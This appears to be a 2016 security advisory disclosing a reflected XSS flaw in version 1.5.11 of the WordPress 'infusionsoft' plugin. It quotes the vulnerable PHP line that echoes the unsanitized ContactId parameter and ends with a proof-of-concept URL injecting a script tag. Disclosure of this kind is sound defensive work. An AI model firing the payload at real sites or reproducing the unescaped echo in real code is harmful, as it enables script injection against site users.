Advisory #: 864
Title: Reflected XSS in wordpress plugin infusionsoft v1.5.11
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site:
Downloads: 21898
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact:, fixed in v1.5.12
Plugin Name: infusionsoft
There is a reflected XSS vulnerability in the following php code ./infusionsoft/Infusionsoft/examples/leadscoring.php: 2: ContactId: <input type="text" name="ContactId" value="<?php if(isset($_REQUEST['ContactId'])) echo $_REQUEST['ContactId']; ?>" /> The variable ContactId appears to send unsanitized data back to the users browser.
CVE-ID: 2016-1000139
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId="><script>alert(1);</script><"